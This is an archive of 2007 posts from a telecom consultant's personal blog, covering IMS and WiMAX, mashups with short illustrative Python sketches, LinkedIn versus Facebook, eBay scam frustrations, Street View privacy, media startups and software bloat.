Sunday, December 23, 2007

Will there be such a thing as a hardphone?

At one of the panels I participated in at VON Fall 2007, we presented our opinions on "Will there be such a thing as a hard phone?". The panel had interesting representation from Plantronics, Adobe, Ayalogic and others, in addition to mine. Naturally, this is not directly related to IMS; it speaks more to 'service convergence' and whether there will be radical form factor changes to what we know as a phone today. My slides are available here

Friday, September 14, 2007

My presentation at Internet Telephony on IMS, WiMAX and all things nice



I spoke at the Internet Telephony conference in Los Angeles last week on IMS, WiMAX, how they all work together (or not), and what it really means to applications. You can see a copy here

Tuesday, September 4, 2007

Speaking at Internet Telephony and our latest IMS report


Hi folks,
My apologies for the lack of postings. It just so happens that Sep/Oct/Nov are the worst three months of travel for me. I have been on the road for most of this month and will be all over the map till the end of November. If any of you are going to be at the Internet Telephony Conference in LA, I hope to see you there. I will be speaking on Monday about "IMS vs. WiMAX", so if you are attending, it would be good to meet. Incidentally, I've been speaking at and attending the Internet Telephony show for several years now, and I must say, Rich Tehrani and the team have done a great job over the years in being innovative. For this show, as an example, they have come out with innovative interviews, video clips and press releases which help in advertising both their name and the participating companies' names. Good on you, Rich! I hope other shows pick up a bit on the ideas these folks have implemented.

On another note, we have just released our July-Aug 2007 IMS Tracking report. You can read an executive brief here.

Thursday, August 16, 2007

LinkedIn vs. Facebook == Vertical vs. Horizontal

There has been a lot of commotion about the newly released Facebook APIs and why Facebook will replace LinkedIn (just Google it and you will notice many prominent bloggers talking about it).


So of course, I tried it. I use LinkedIn a lot.


Recently, I read a specific post by Jeff Pulver saying he is abandoning LinkedIn to go with Facebook.


Naturally, the decision to switch is subjective, but as far as my personal opinion goes, I don't see them as overlapping. Here are a few reasons why:


(Note: all of this is related to using Facebook as a 'BUSINESS networking tool')


  1. Horizontal vs. Vertical: LinkedIn is a 'vertical' tool. It is meant for networking of business professionals for business needs. Facebook seems to be a 'horizontal' tool - it allows business networking as well as networking for non-business needs, like, say, going to the movies, planning a party and what-not.

  2. East is East and West is West: My business life and profile are different from my personal life and profile. I'd love for my buddy to see my mood as 'What the heck is wrong with the world today', but I don't see any reason why the same mood needs to be 'exported' to my connected business colleagues.

  3. Credibility of network: It seems everyone joins Facebook, be it a college dude, a stay-at-home mom or a seasoned professional. Thanks to the marketing of LinkedIn, it seems to me that mostly business professionals join it. Now ask yourself this: "How many invites do you actually reject?" If the answer is none or close to none, well, then if you want to use Facebook for business referrals, why would you go for a horizontal tool?

  4. Lack of features a good thing: I am a strong believer that specific relevant features are better than a potpourri of irrelevant features mixed with relevant ones. LinkedIn offers targeted, easy to understand business networking features, such as its Q&A, InMail and Recommendation system. Facebook, on the other hand, has hundreds (thousands?) of plugin applications made by developers, and honestly, I have no idea how any one of them will behave until I actually use it. For business networking you need simplicity and clarity of representation.

  5. Clean and relevant interface: Finally, I find the Facebook layout to be terribly confusing and overloaded with information. For example, from a business networking perspective, do I really care to see "Mr. Foo Foo is currently at work" or "Mr. Foo Shoo just added the OhIluvIt application"?

So net-net, I just don't get why people think Facebook will replace LinkedIn as a 'BUSINESS' networking tool. As a 'social' networking tool, sure, I get it.

Facebook = LinkedIn (parts) + Orkut (parts) + a whole bunch of customizable apps

As Facebook's own website says, "Facebook is a SOCIAL utility that connects you with people around you".

Conceptualize your startup in 1 minute


Presenting the most powerful framework for conceptualizing your company.

Credit: here
Source I read it from: here

See this: http://www.tdbspecialprojects.com/

Click on the central 'shuffle' button for 'innovation'.

Thursday, August 2, 2007

When have you just about had enough with the 'Always on' Blackberry?




When do you know you have had enough of ‘always connected Blackberry’ ?

  • When your blinking of the eye matches the rate of the red LED blinking of your Blackberry

  • When you wake up at 2AM to drink water, check your emails instead, then go back to sleep wondering why you are still thirsty

  • When your hand automatically reaches down to your holster because it ‘vibrated’ only to find your phone is in your pocket, or worse, not even with you

  • When you promise your wife not to sit with the laptop all the time only to scroll through your blackberry hidden on the other side of the couch

  • When you like to keep holding your phone because of its ‘warmth’

  • When you make it a point, while traveling, to smile at someone else using a BlackBerry and then take yours out for a second, polish it and place it back, thinking this is some sort of camaraderie of BlackBerry users

  • When you have spent more money buying ‘screen protectors’, ‘glass replacement screens’, ‘skintight covers’ and other gadgets as compared to the cost of the phone itself

  • When you get withdrawal symptoms if the red ‘new mail’ LED does not start flashing every two minutes

  • When you find yourself opting for a $400-a-month BlackBerry plan which includes unlimited data, unlimited roaming and a gazillion calling minutes, 'just in case you are in the middle of Tanganyika and need to make a call home'

  • When you keep checking your current GPS location (you know, on the new 8800 series), even though you are sitting in your OWN friggin' house on your own friggin' recliner

  • When you Loctite-glue your BlackBerry holster clip to your belt, so you never forget to 'latch on'

  • When your pastime involves how smoothly you can maneuver the ‘pearl’ so that the cursor moves in a nice circle around your icons (applicable only to pearl users)

  • When you own a wall socket charger, a USB charger and a hand-cranked charger for your blackberry to make sure it never runs out of juice

  • When you have downloaded Yahoo Go!, Google Mobile, BBMaps, Telenav, WayFinder and other local search and/or GPS apps and use them ALL for every search, just to see which is better for this particular query

  • When you insist on posting notes/messages from your BlackBerry even though you are in front of a computer, because the "Sent via BlackBerry® from Cingular Wireless®" tagline at the end of your message makes you feel sophisticated.

And you think adding ‘Presence’ to such devices will be a success in the consumer market! Ha. Bite me.

(Sent via BlackBerry® from Cingular Wireless®)

Friday, July 20, 2007

Get serious about Mashups: "Foo Foo sh*t for college kids"



As part of my job, I get to meet and talk to many talented individuals and a wide variety of customers, ranging from the garage startup that just opened up in Palo Alto to scowly-faced old codgers sitting in dark brown leather chairs, with three levels of secretaries you need to wade through for a meeting.

The great part about this is that I get to learn a lot and hear opinions from all sides.

A very good friend of mine recently commented that the "talk in his town" is that people who keep talking about mashups are "college kids" doing "foo foo sh*t". Another good friend of mine in Boston recently commented, "Oh, a mashup. Yes, we did one too. They are just toys".

And I can't say that I completely disagree with these opinions, even though I personally think there is huge promise in the "core concept" of a mashup. Every time anyone mentions "mashup" and "making money", half the audience in a room inevitably chuckles (about the making money part).

So I compiled a top ten list of how I think mashups should be marketed to cut the hype and get serious:

  1. Give a break to 'user generated applications'. There is no evil in 'service provider hosted applications' - Mashups are not just great tools for the average Joe to slap a great service together. They are equally important for 'walled-garden' providers, reducing their own time to market for new services and increasing their 'service attractiveness'.

  2. Cut the acronym jargon and talk about core concepts. Mashups are not about "AJAX, Web 2.0, SAAS, DOJO, YUI, GWT". You don't need to put them all in one sentence for people to assume you 'get it'. At the core of 'mashups' lies a distributed architecture, based on Web standards, which allows for creating hybrid applications.

  3. Give a break to YouTube, HousingMaps and GoogleMaps. A vast majority of services 'out there' are demonstrations of how you can scrape YouTube for a filtered playlist, or place markers of some sort on Google Maps, with HousingMaps constantly being cited as the "poster boy". Mashups are equally useful in services that have nothing to do with maps or user videos. For example, how about using a mashup to integrate presence into conferencing (presence enabled auto-dialout of participants)? A sketch of this follows the list.

  4. Goooooooogle Advertising. I am tired of hearing the eyeballs-to-revenue story. Think of innovative ways in which you can charge for a service, beyond 'offering it free' and hoping to make money from advertising. Why can't you think of a differentiated service plan for accessing some 'premium' features of what the mashup provides? And if you think people will not pay for it, why continue to talk about mashups as a viable business model? For example, Jeff Pulver's FWD recently moved to a split model of free calls and paid-for services. Now if Jeff were to add presence based dialing out to premium callers, that would be a valid business model, wouldn't it?

  5. Not just the browser. People keep touting that Mashups and browsers have an exclusive license to speak. Not true. A mashup can be rendered on any ‘User Agent’ that is compatible with the web standards required for the mashup. And this can also be local thick applications ! Every time someone mentions ‘browsers’ I see the entire mobile value chain of ISVs and OEMs cringe.

  6. Stop talking about ‘Web 2.0izing’ your world. What the bleeding hell does that mean anyway? Think about what value you are trying to bring using a mashup. Are you trying to create a platform where 3rd party video/voice/content can be integrated, say, using a common template language (like Google Mashup Editor for instance) for quicker development of services ? Say so. Are you trying to re-use other platforms and use their data to create your own service without the need to host the other data you are accessing? Say so. Any of this is better than saying “I am Web 2.0izing”

  7. Read about licenses before you talk about building "commercial" applications using 'free' platforms. I've seen many cases of eager engineers making great pitches about how they could create a service using Google or Yahoo platforms (Pipes, GME etc.) without ensuring that these platforms allow 'free commercial usage' (they certainly allow free personal usage). Not understanding the legal limitations of 3rd party tools is embarrassing.

  8. The 'bridge' approach is better than the 'build a new planet' approach. If you are a firm believer in the Internet and mashup model, you don't need to be a hater of all things legacy. People don't 'overhaul' their lives, nor their user experience expectations. They prefer to 'change them incrementally' for the better. So think of ways in which your mashup can make an experience better for an existing service the user may already be using (a bridge to a better way), as opposed to 'throw your $30 phone away and buy a $499 iPhone so you can run my mashup in its Safari browser'.

  9. AJAX and mashups are not the same thing. AJAX is "one" technology (a suite of them, really). A mashup is an architectural concept. Besides AJAX, there are other technologies, such as Flash, which are better suited for several environments (including mobile applications and streaming related mashups). So don't continue to needlessly bundle them together in concept and 'market talk' unless your product actually does that (special note to the analysts here, who talk about the market).

  10. Patience. Build it. Business plan. Build it.
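To make item 3 concrete, here is a minimal sketch of the presence enabled auto-dialout idea. Everything in it is hypothetical: the two REST endpoints, their JSON shapes and the presence states are invented for illustration, standing in for whatever presence and conferencing APIs a provider actually exposes.

    import json
    import urllib.request

    # Hypothetical endpoints; a real provider exposes its own APIs.
    PRESENCE_API = "https://presence.example.com/v1/state"
    DIALOUT_API = "https://conf.example.com/v1/dialout"

    def presence_state(user):
        # Fetch the user's presence state, e.g. "available" or "busy".
        with urllib.request.urlopen(PRESENCE_API + "?user=" + user) as resp:
            return json.load(resp)["state"]

    def dial_out(conference, user):
        # Ask the conference bridge to place an outbound call to the user.
        body = json.dumps({"conference": conference, "callee": user}).encode()
        req = urllib.request.Request(
            DIALOUT_API, data=body,
            headers={"Content-Type": "application/json"})
        urllib.request.urlopen(req)

    def start_conference(conference, participants):
        # Only dial out to people whose presence says they can take the call.
        for user in participants:
            if presence_state(user) == "available":
                dial_out(conference, user)

    start_conference("weekly-sync", ["alice@example.com", "bob@example.com"])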

Sunday, July 8, 2007

eBay and Trust



I don't claim to be a heavy eBay user. But I do buy and sell stuff occasionally, and my recent experience selling on eBay could be a good indicator of what is probably worrying eBay's execs: managing scale. For the past month or so, I've been trying to sell a laptop on eBay. I've listed the item twice already, and here is what happened both times:

1. Within hours of listing, I get sent messages of two categories: people who want to cheat the system and barter offline, and scammers with manufactured or stolen eBay identities who want the "usual" information. I spend valuable time dutifully forwarding it all to the security folks at eBay.

2. During the weeklong listing, I spend even more time responding to form responses from eBay and handling email discussions with call center agents who plainly have no expertise in managing security.

3. During the last day or two of the auction, three or four genuine buyers appear, whom I communicate with and keep engaged.

4. During the last minutes, I see bidding begin and watch my genuine buyers get beaten by scammers with stolen identities, who win the auction with outrageous bids. I cannot do anything. Things move at the speed of the Internet!

5. I then get a "Congrats" email followed by a "sorry, the scammers beat us" email, and to protect the integrity of the network (read: eBay probably doesn't want this information becoming public) the entire listing is removed.

This got me thinking and I've come to the following conclusions that you might or might not agree with:

- E-Commerce is now no different than regular commerce. An Internet business will initially probably have advantages due to the network effect, but in the end they will end up just like the other utilities: they will struggle to manage scale and offer a compelling service. My eBAY experience was no different than calling my telephone or cable company: Form responses, casual processes to address core business competencies, and frustrating customer service.

- Internet establishments will progressively develop a tiered system. The big customers will get all the attention, and the small/occasional customers will not be able to take advantage of the benefits the network provides. It won't be egalitarian like it used to be.

- Secure E-Commerce is elusive. Internet businesses who depend on earning money through customers they trust will struggle to keep their infrastructure secure. There is a constant struggle between expanding the user base and offering a secure environment. There has to be a better way than the best computer scientists being routinely defeated by the dolts with a phone and a laptop from the most "backward" regions of the world.

eBAY is probably the most innovative of Internet businesses. Their annual report proudly states:


Our purpose is to pioneer new communities around the world built on commerce, sustained by trust and inspired by opportunity.

If eBAY is struggling to sustain trust, I shudder to think what the industry is going through. I am sure there is a venture opportunity in all of this! Know of any?


Tuesday, June 5, 2007

The Value of SIP/Presence to RSS: A new world of Mashup Editors



I keep telling folks around me that in this new world, "code complexity" is not the engineer's archetypal org*sm. It is "idea innovation". Those who still love dreaming about complex call control and the sorts will progressively slide down the bell curve of the future.

First there was Yahoo Pipes - a great new 'tool' that allows developers to build on existing web resources and create a chained service by piping RSS feeds. Now there is Google Mashup Editor (GME), Google's response to the innovation shown by the Yahoo team. Frankly, GME takes 'mashup' creation a notch higher. By exposing a programmable interface and letting us chain RSS feeds and link them to HTML, CSS and JavaScript code, Google has effectively allowed us much more creativity, including over the service's form factor (how it will look). This is truly the beginning of Web 2.0 based Service Creation Environments and is an area to watch.
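As a small illustration of what this chaining amounts to, here is a Pipes-style flow sketched in Python: fetch a few feeds, filter by keyword, sort by date. It assumes the third-party feedparser package, and the feed URLs are placeholders.

    import feedparser  # third-party: pip install feedparser

    # Placeholder feed URLs; substitute whatever blogs you want to chain.
    FEEDS = [
        "http://example.com/blog-a/rss",
        "http://example.com/blog-b/rss",
    ]

    def merged_feed(keyword):
        # Keep entries whose title matches the keyword and that carry
        # a parseable published date.
        entries = []
        for url in FEEDS:
            for entry in feedparser.parse(url).entries:
                if (keyword.lower() in entry.get("title", "").lower()
                        and entry.get("published_parsed")):
                    entries.append(entry)
        # Sort newest first, like the Pipes 'sort' operator.
        entries.sort(key=lambda e: e.published_parsed, reverse=True)
        return entries

    for entry in merged_feed("IMS"):
        print(entry.published, "-", entry.title)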

But anyway, how about the following service:

'Trackit' is a presence publishing system that allows different Presentities to update their presence state periodically. Presentities that publish their state also specify access rules which govern who can read this presence. Pete is a paid subscriber to 'Trackit' and decides to offer a 'Map & Track' service on top of Trackit and GoogleMaps, like so: users who use Trackit can now use Pete's service, where they can track each other's presence location and presence state on Google's scrolling maps. And this is just the beginning. Later, Pete decides to also add traffic information to the map, so users can not only see each other's location and presence state, but also the traffic in that area (so Mary knows Joe is 2 miles away, and is in heavy traffic).

Now what if all of this could be done by Pete in 10-15 lines of code? That is what fantastic new generation tools like GME make possible. What is missing now is mapping the SIP presence state of the users into an RSS feed, so that 3rd party developers can continue to use the existing framework to integrate relevant SIP state into their mash applications.
Motivated by this concept, I wrote up an Internet Draft titled "Motivation for RSS Feed for Presence State". Take a look and comment, if you'd like.

Abstract:

RSS Feeds have always played an important role in providing users content related updates, typically of Websites, without having to visit those websites manually. Typical examples of RSS usage include users 'subscribing' to the RSS feed of a website, say, CNN.com, and thereby automatically receiving 'news headlines' when the content changes. Recently, there have been significant innovations (such as Yahoo Pipes and Google Mash-up Editor) where RSS feeds from different sources have been combined to produce new services in a 'Web Based Service Creation Environment' model, allowing users to create interesting services building on top of 'primitives' that can be represented on the Web. This document describes the motivation for an RSS feed for Presence information, which the authors believe would be useful to create new services using a similar environment described above.

In short, SIP goes far beyond voice. SIP has a wealth of information in it which adds a very rich dimension to creating combined services. I could go on and on with other examples, but not in this post.
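To give a flavor of what such a mapping could look like, here is a tiny sketch that wraps one presence state change as an RSS 2.0 item. The element layout is invented for illustration; the actual format would follow the draft.

    from email.utils import formatdate
    from xml.sax.saxutils import escape

    def presence_to_rss_item(user, state, note=""):
        # One presence state change as a minimal RSS 2.0 document.
        # The channel/item layout here is illustrative only.
        lines = [
            '<?xml version="1.0"?>',
            '<rss version="2.0"><channel>',
            '<title>Presence feed for %s</title>' % escape(user),
            '<link>http://presence.example.com/%s</link>' % escape(user),
            '<description>Presence state changes as RSS</description>',
            '<item>',
            '<title>%s is now %s</title>' % (escape(user), escape(state)),
            '<description>%s</description>' % escape(note),
            '<pubDate>%s</pubDate>' % formatdate(usegmt=True),
            '</item></channel></rss>',
        ]
        return "\n".join(lines)

    print(presence_to_rss_item("pete@example.com", "available",
                               "2 miles away, in heavy traffic"))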

And here is a demo of the Trackit service in the draft, written in GME:

Try it out:

http://rsspresence.googlemashups.com/

Screen shot: (GME does not yet allow the mashups to be listed on external sites)

Saturday, June 2, 2007

License plate reading with Google Street Views



Every time I wonder if there is anything left to do on this new generation of scrollable maps from Google and Yahoo, one of them surprises me. The latest is the neat addition of Google Maps Street View (here), where you can see real street images and navigate around.

But the level of detail captured is, well, um, surprising. See for example a car that was parked on the street in one of their street views. I can easily read the license plate even without enhancing. But see the enhanced image too - no special tools, just some sharpening and saturation. In fact, the image was so readable that I masked a part of it with a black box in this version.



At this level of detail, for all those folks doing things they should not be, watch out - you are on a world-wide candid camera :-)



(click on image for larger view)

Tuesday, May 29, 2007

IMS: Ideal Architecture for Quadruple Play for Operators


The July 2007 IEC publication, titled "Beyond the Quadruple Play: Networking, Convergence, and Customer Delivery" will feature an article I wrote on behalf of my company which talks about why I think IMS is the ideal architecture for such a network.


The download link to the paper is here. (Sorry for the indirection, but as I said, I am going to liberally promote my official blog here too - don't complain - you ain't paying *grin*)


Abstract:

Broadband IP is a great leveling ground when it comes to converged services being offered by multiple providers. For example, with the availability of broadband, companies such as Vonage could offer IP based phone replacement solutions, threatening the turf of established phone operators. Similarly, Comcast can now suddenly offer cable VoIP (phone service) and Verizon can now suddenly offer TV services over IP, each threatening the other in service areas that were traditionally never its turf. Broadband IP has also enabled 'new kids on the block' like Skype, Joost and others to offer bundled services that threaten the trillion dollar communications industry as we know it. This is one main reason why carriers are competing to stay alive with "Quadruple Play" blended services that combine Voice, Video, Data and Wireless accessibility into one.

However, providing Quadruple Play across heterogeneous networks (WiMAX, DSL, cable, cellular etc.) is a non-trivial task, and one needs a robust, well thought out architecture which ensures that services can be provisioned and provided uniformly to subscribers, in a way that lends itself to a seamless user experience and to operator provisioning, charging and billing.

This paper describes the merits of IMS (IP Multimedia Subsystem) - an over-arching architecture specification that enables uniform IP based service delivery over diverse network types (WiFi, DSL, WiMAX, cellular technologies etc.) - as the ideal architecture for operators to deliver Quadplay services to their users.

Monday, May 14, 2007

New IMS blog

Folks, I just wanted to let you know that my company has started a new IMS blog. This is part of our overall IMS consulting services. For now, you will find common posts, so please don't panic and press the plagiarize button. Both blogs are controlled by me, and I will continue to cross-post as I see fit. The company blog, however, may have some additional posts related to our IMS Standards Tracking package or other such stuff.

Tuesday, April 24, 2007

Wireless vs. Wired


A colleague had emailed me this simple image a while back. They say sometimes an image can be worth a thousand words. I thought this image powerfully depicts the engineering challenges that lie behind making wireless networks 'work well'.

(I have no idea about the original source of the image, so if someone knows, please email me and I'd be happy to post credits.)


Monday, April 23, 2007

IMS deployments - on the rise and around the corner


Are you surprised by the title? Well, that is really how I see things as they stand today. Based on my discussions with most OEMs and ISVs, who have themselves been running trials all over the world for a few years now, we are just about at the phase where most trials are getting out into real deployment. Incidentally, in case you think that IMS all-IP 'live' deployments have not yet happened, think again. Remember the 2006 announcement that Wateen Telecom selected Motorola for a WiMAX deployment? Well, that network does data and is ready for voice. Not sure if you knew, but that entire network runs over an IMS subsystem (yes, you guessed it - WiMAX on its own is not a session specific architecture, while IMS is, so it makes sense to have IMS on WiMAX, huh?). And yes, I mean R5+, which is all IP for both signaling and media.

Several greenfield operators are already deploying or have deployed IMS driven networks (we work with many of them), but very few are touting the IMS name right now, since IMS has been a long-used, much-abused and somewhat delayed technology. But make no mistake, IMS powered networks are on the rise. Based on my discussions with several players, IMS deployments are on a steep rise, partly due to ongoing WiMAX trials. It is worth noting that most of the WiMAX trials today are about 'high speed data' and not voice. In other words, WiMAX as it stands today, as defined by the WiMAX Forum, is only at the IP-CAN level - all the blazing speed for an internet connection, but not voice calls, voice features or the other session level services. And please, don't tell me "why do we need anything? P2P solves everything!". Well, it doesn't. You need centralized services for technical and non-technical reasons. For example:

a) Technical: How on earth do you reliably implement a voice mail system and retrieve messages when a person is offline? What happens if the peer node that stored your VM is offline when you come online?
b) Technical: How do you implement feature interaction (for example, A forwards to B, B forwards to C, but by mistake C sets a forward back to A), when in a P2P network no node knows what service the others have provisioned?
c) Technical: How do you implement dial-plans?
d) Non-Technical: What do you do if your "spectrum provider" (you know, in a wireless world, someone is paying for expensive spectrum) blocks VoIP?

And again, this goes back to the original statement I made in an earlier post - "IMS is the only architecture out there today which supports mobile, fixed and nomadic networks" from a session, policy and interworking perspective. Admittedly, some of these areas are still 'in progress' from a standards perspective, but it is the farthest out there in terms of maturity. It was also good to learn that Verizon has decided to open up A-IMS and push it to standards bodies. A lot of vendors and operators have done good (but to date proprietary) work on enhancing IMS and filling in gaps, so it is good to see it become more public.

And finally, if you are wondering about this post because you hardly hear IMS being talked about today, that is because we are in the stage between "Hype is over" and "Deployment is reality". Here is how I describe it to many:

Friday, April 13, 2007

Everyone wants to be a YouTube




My apologies for not posting for a while. Besides my own family needs, I've also been travelling a lot the past few weeks and visited the usual shows like VoN, CTIA and others. (In fact, Jeff managed to catch me at his show here - I'm the one with the widest grin.)

It is always interesting to see what the next big thing on everyone's mind is. And it is no surprise when I say that right now, it is "Media".

A lot of my good friends have either started their own “Media” companies, want to start their own Media company, have started and have changed their business plan thrice already, or are hobnobbing with content producers and aggregators to see if it makes sense for them to start their own media company.

And I use the term “media” in the loosest possible way, because so do they. What they want to do ranges from “Video Streaming” to “Digital conversion” to “lifestyle content” and what-not.

I spent a full day at the CTIA’s Mobile Billboard event, where folks from AMP’D, MTV, Atlantic Records et al came in and spoke about how they view the next decade of media, and I always like listening to their opinions, since they have been in media for a long time, as opposed to us telecom gear-heads who think media is as simple as building a switch.

And as usual, I have my own opinions and thoughts for those in the ‘build a media company’ as well as the ‘mobile content’ fray:

  • It was interesting to note that in the mobile world, people are used to paying for content, while the desktop world is littered with 'free to use - we make money with ads' schemes. It was fascinating to hear Bill Stone, CEO of AMP'D, talk about how AMP'D ARPU is over $100 these days, with people happily paying for polished episodes telecast to their phones (they call them mobisodes). An interesting side effect of this is that mobile TV is a really cheap way to get into TV broadcasting without the huge costs. Take AMP'D's relationship with Comedy Central - Lil' Bush was such a success that Comedy Central signed up with them to broadcast the series on TV as well. AMP'D did not have to pay the millions required to enter through traditional broadcast TV media.

  • I am personally petrified by the 'eyeballs to revenue' business strategy, simply because I've seen it be the primary cause of the 2000 dot-com bust. If you are thinking of opening up such a company, I'd love to see you have a real business plan. It is just my gut feel that one good way would be not to ignore the mobile world: try to enter the mobile space first with targeted solutions and then spread to the desktop world, not the other way around. I just think there are too many strong players in the pure desktop market for VoD, IPTV and similar solutions, including Google, Fox, Joost, etc.


  • Building a Video/Audio/TV streaming product is not just about slick interfaces. I'm getting a little tired of companies focussing on slick interfaces and oomph factors at the UI level while focussing less on what matters more - a non-jittery video feed, good lip syncing, good caching, and effective CPU utilization that doesn't choke my dual core CPU to death.

  • You won't believe how many people think they need to build their own overlay architecture to provide solid video streaming quality. I don't think that's a bad thing, but I have yet to see a good quality overlay network. I've used Joost too, and I think its quality is no better than many others I've tried. I'd strongly suggest people look at re-using well-established content caching infrastructure like that provided by Akamai and Limelight.

  • User generated vs. professionally generated content: It was interesting to hear that, at least in the mobile space, all the content providers today seem to feel there is little or no market for user-generated amateur content. Instead, they strongly believe people will continue to watch professionally created content, and that the mobile medium is unlike the desktop medium, where user-generated YouTube content is widespread (but again, would you be willing to pay to watch a video some teen created, and if not, how will anyone except Google actually make money?)

  • I am really against those who are trying to replicate the 'desktop' environment on your mobile. Sorry, but I've long been playing with content adaptations and virtual screens for mobile, where the effort is to make your mobile screen as rich as your desktop. I just don't buy it. Let's face it, the form factor is different, the MMI is different, and the needs are therefore different. No matter how hard adaptive browsers try (like Opera Mini), it is impossible to effectively predict what is relevant and what is not. I'd much rather have a clean and intuitive interface for the mobile, and I don't think it should be the same. Which is why I am a supporter of the .mobi movement. Trying to retrofit two different MMIs (Man-Machine Interfaces) together is painful. That is not to say I am against making mobile interfaces more powerful - I am all for it. But make them more powerful at what is relevant to a mobile MMI. On the same lines, I am a little distressed about the new Google and Yahoo mobile search adaptations. Their focus seems to be completely on 'reduced clicks'. Well, besides 'reduced clicks', the next and perhaps more important factor is 'reduced scrolling'. In the effort to produce maximum information with minimum clicks, both these solutions put lots of gunk on the screen (if I type "web 2.0" it will not only search the net, but also local, images and the rest). Not fun.

  • Getting bought out as the only exit strategy is scary. In this new content/media space, very few are looking at scaling. Most seem to be interested in getting around a million ‘eyeballs’ and then are hoping to get bought out by the biggies like Google, Yahoo, AOL, and the rest. First, there is a very small chance that you will actually get bought out, and an even smaller chance that you will get bought out for a profitable amount. This directly ties in to your expected revenue model. If you cannot figure out a mechanism where you will get paid per subscriber, you likely have a hard to win model in the long run.

Tuesday, February 27, 2007

BLISS -- Service Interoperability


Those of you who have been in the industry long enough know that the vision of SIP is not fully realized because of interop issues between vendors on even the most basic business telephony features.


There have been various efforts by industry groups like the SIP Forum, while individual vendor initiatives like Sylantro's usually result in competitor comments about the implementation being proprietary, etc. The back-and-forth understandably keeps going on. This ends up frustrating customers and end users.


There is hope finally! The SIP chairs have now decided to tackle this services interoperability issue head-on by putting together a BOF called BLISS. The name is apt, and I would strongly recommend that any of you who are in the industry support this initiative and actively participate in the discussion.


Saturday, February 24, 2007

Off for a few weeks


Hi Readers,

Just a short post to let you know that this blog may be quiet for the next few weeks (hopefully shorter). I am in the process of discovering how lovely yet strenuous it is to manage our newborn son :-)



A Note to my friends from Russia: Thanks for your email - I apologize for not having responded yet - I will certainly put some thought on your questions and write back by next week.

Thursday, February 15, 2007

Lemonade 2.0



(c) Corporaterat (please retain copyright if you copy)

Oh just a cartoon. Sometimes, I get the itch to draw.

Tuesday, February 13, 2007

Indexing should get smarter for bloggers




There are several reasons why bloggers post. A part of it, I believe, is to share technology, and for many, including me, it is a great tool to meet like-minded technology people, who often respond by private email. But I'd be willing to go out on a limb and state that the biggest reason most bloggers blog is that they like to have a podium to talk and be heard, albeit virtually. This also means, therefore, that a vast majority of bloggers (including me) are 'hit counter' maniacs. We love to log in and see how high our 'hit count' is for the day, and who referred to us. There. I said it. Nothing wrong with it. I love what I call 'ego searching'. It's not a term I invented; phpBB forums have used it for many years.

And this is where I think major search engines like Google and Yahoo can do a better job. See, both of them give you an option for either searching within other blogs (who in the blogosphere links to you) or the whole web. The former is limited while the latter is problematic.

Let me explain. There is a difference between adding an analytics tool to your site vs. searching for who links to you. The latter is a superset of the former. The analytics tool will catch referrers (assuming they are not locked) only if the referring site results in a click to your site.

I often use Google Webmaster Tools and Yahoo Site Explorer to see 'inlinks'. And the problem is that every time someone popular links to this blog, the inlink counts go for a toss.

Take, for instance, a couple of days ago, when Jeremy Zawodny linked to one of the pipes I created with Yahoo Pipes. Admittedly, I haven't been reading too many blogs in the search engine world, but it seems Jeremy's blog is heavily read and linked, so that in turn resulted in a good surge of hits to my site. I think that is fantastic. But here is the rub: when a post gets added to a person's blogroll or sidebar and the blog is re-published, both Goog and Y! assume that every page in that blog showing the same sidebar naturally must refer to me as well. Net result: I get 100s or 1000s of 'false inlinks', as I call them. This has happened before as well, with another site that had added me to their blogroll, where I saw 100s of false positives. Well, they are not really false positives - since it is a sidebar, it does actually link to my site - but search engines should be smarter while indexing and do a little better with this.

Suggestions:
1. Add a voluntary tag which bloggers can put into 'sidebar' or 'blogroll' entries, like, say, "indexOnce", which means that even though this is part of every page, it does not mean every page is talking about it.

2. Get a little smarter at the indexing as well.
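On suggestion 2, here is one hedged sketch of what 'smarter' could mean: if a link to you appears on nearly every page of a site, it is probably a sidebar or blogroll link, so count that site once instead of once per page. The 80% threshold and the crude host extraction are assumptions for illustration only.

    from collections import defaultdict

    def count_inlinks(pages, target, template_threshold=0.8):
        # pages: dict mapping a page URL to the set of outbound links on it.
        by_site = defaultdict(list)
        for url, links in pages.items():
            host = url.split("/")[2]  # crude host extraction, for illustration
            by_site[host].append(target in links)
        inlinks = 0
        for host, hits in by_site.items():
            if sum(hits) / len(hits) >= template_threshold:
                inlinks += 1          # template link: count the site once
            else:
                inlinks += sum(hits)  # in-content links: count each page
        return inlinks

    # Three pages of one blog all carry the same sidebar link to me:
    pages = {
        "http://blog.example.com/post-1": {"http://me.example.com/"},
        "http://blog.example.com/post-2": {"http://me.example.com/"},
        "http://blog.example.com/post-3": {"http://me.example.com/"},
    }
    print(count_inlinks(pages, "http://me.example.com/"))  # 1, not 3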

Monday, February 12, 2007

Burn those virtual calories



"Please change MOV AX,0 to XOR AX,AX. You save bytes. Also, please use shift operators instead of divisions. You save on cycles"


Common speak during the days of DOS and protected mode coding – when C and ASM worked hand in hand.

Then came the 'abstract high level programmers' who never really cared about declaring an int where only a byte is needed, or using multiple structs where a union would suffice.
Then came the 'Object Oriented' programmers who never really cared to understand how virtual functions really worked or how they affected performance and/or size, and used them pretty much everywhere without blinking an eye.
Then came the visual programmers who would love to drag and drop 'graphic objects' that would increase productivity by 150% and reduce time to market by 300%! Woo haa. It's another matter that each 'visual object' generated 300-500 lines of gob.
Then there was XML & buddies - the whoopie-doo do-it-all markup language for representing anything.
And DHTML and JavaScript to add funky effects and client side programming to increase 'web interface coolness'.
Then came the idea of using the Internet for communications!
Then came SIP, a great text based protocol, which generates anything between 500-1000 bytes for each message that passes to and fro, with the capacity of 'adding more as it goes along the network'.
Then came ambitious vendors who stuffed SIP with a gazillion features like X-Vendor-Header:my.state=park.activate or X-Vendor-Header: (actual JPEG thumbnail here!) which generated anything between 1000-8000 bytes per message!
Then came the world of AJAX, with a gazillion websites blindly embedding large JS 'libraries' to provide fancy effects.
Then came the first level of convergence - chat & email together! See this.
Then came RIA - combining funky web stuff with cool VoIP stuff, all on the internet - IPTV, VoD, and all the fun things.
Then came an abundance of soft-phones like Skype. Eat up as much memory as you can give it. In fact, I even talked to another vendor in a similar business and he said "Who cares! Add more memory!"

Whoopie-do. Who cares about size, right? Broadband rocks. CPU power is king.

Then came the problem of deploying all of the above en-masse.

XML led to Binary XML. It was felt that, for many applications, the XML schema definition itself far exceeded the content it was carrying.
Then came JSON, the 'fat-free' alternative to XML.
Then came SigComp, a mechanism to ZIP SIP, so to speak, so that it could be used effectively in mobile networks.
Also came the call by the SIP authors to stop using it as a protocol to carry anything under the sun.
Then came the call by AJAXers to have browsers 'do more stuff' so they don't have to pass large libraries around with each page.
Then came reports of the first IPTV deployments. Performance mostly sucks.
